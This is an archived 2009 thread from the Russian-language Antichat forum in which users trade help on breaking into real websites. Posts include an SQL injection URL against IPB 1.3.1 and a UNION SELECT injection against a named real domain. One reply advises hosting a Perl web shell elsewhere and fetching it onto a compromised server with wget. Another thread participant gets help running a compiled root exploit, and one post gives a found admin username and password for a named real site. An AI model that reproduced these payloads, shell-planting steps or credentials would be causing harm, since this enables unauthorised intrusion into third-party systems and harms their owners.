ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.10.2009, 18:44
|
|
Познающий
Регистрация: 16.03.2009
Сообщений: 82
Провел на форуме:
148667
Репутация:
23
|
|
Народ привет. Извините если боаян.
Есть такая штука но не уверен что ето уязвимость.
На форуме IPB версия 1.3.1 при вводе в урл такой строки
http://[target]/ipb/index.php?act=Online&st=-1
видает такое:
Что можно с етим сделать? или ничего?
И еще если после запуска сплоита на перле с командной строки, там где должен находиться хеш пароля админа написало слово FAILED. Значит етим сплоитом ничего уже не сделаеш? |
|
|
09.10.2009, 19:17
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Patronik
Народ привет. Извините если боаян.
Есть такая штука но не уверен что ето уязвимость.
На форуме IPB версия 1.3.1 при вводе в урл такой строки
http://[target]/ipb/index.php?act=Online&st=-1
видает такое:
Что можно с етим сделать? или ничего?
И еще если после запуска сплоита на перле с командной строки, там где должен находиться хеш пароля админа написало слово FAILED. Значит етим сплоитом ничего уже не сделаеш?
Да, там сразу SQL Иньекция идёт.
|
|
|
|
09.10.2009, 20:42
|
|
Новичок
Регистрация: 19.09.2009
Сообщений: 21
Провел на форуме:
79612
Репутация:
4
|
|
Скажите, пожалуйста, как залить перл шелл ? Сложность в том, что нужно заливать в ascii, а я не знаю как это сделать за неимением фтп-доступа.. доступны wget, lynx. может его создать прям на хосте можно(имется пхп веб шелл, доступна system() )
|
|
|
|
09.10.2009, 20:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Залей шелл куда-нибудь, на тот же народ.
потом скачай его на сервер командой
wget http://yoursite.com/perlshell.pl
только вопрос зачем перл шелл, если уже есть пхп-шелл, при этом даже доступны системные команды?
|
|
|
|
09.10.2009, 22:49
|
|
Новичок
Регистрация: 25.01.2008
Сообщений: 5
Провел на форуме:
46816
Репутация:
-10
|
|
скомпилил, запускаю рут сплойт, пишет:
/bin/sh: line 5: ./a: Permission denied
что это значит ???
|
|
|
|
09.10.2009, 23:04
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от totem
скомпилил, запускаю рут сплойт, пишет:
/bin/sh: line 5: ./a: Permission denied
что это значит ???
ну а ты сам-то как думаешь? М.б. перевести эту надпись?
не боись, переводи, и тебе откроются великие тайны
|
|
|
|
09.10.2009, 23:14
|
|
Новичок
Регистрация: 25.01.2008
Сообщений: 5
Провел на форуме:
46816
Репутация:
-10
|
|
Сообщение от jokester
ну а ты сам-то как думаешь? М.б. перевести эту надпись?
не боись, переводи, и тебе откроются великие тайны
Может есть вариант это обойти ? Я не совсем врубаюсь это интерпретатор не может его запустить или сам сплойт не может sh запустить ?
|
|
|
|
09.10.2009, 23:18
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394
Репутация:
74
|
|
Сообщение от totem
скомпилил, запускаю рут сплойт, пишет:
/bin/sh: line 5: ./a: Permission denied
что это значит ???
Перевожу, ибо не могу на это смотреть
/bin/sh строка 5 ./a доступ запрещен
З.Ы писец,в разделе уязвимости переводом занимаюсь!
|
|
|
|
09.10.2009, 23:48
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от DrAssault
Собственно вопрос, как добиться вывода в этой скуле...
Код:
_http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),0x27,10+--+
грубо говоря чтоб был редирект нужно чтобы 9-е поле возвращало нечисловой результат.
2totem
chmod +x a
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 09.10.2009 в 23:56..
|
|
|
|
10.10.2009, 02:32
|
|
Новичок
Регистрация: 03.10.2009
Сообщений: 18
Провел на форуме:
190772
Репутация:
5
|
|
Подскажите плиз
Код:
http://www.dvds4vets.org/admin/
нашел лог и пасс Administrator:Larry
пас не был зашифрован, но в админку не пускает, в чём ошибка? |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
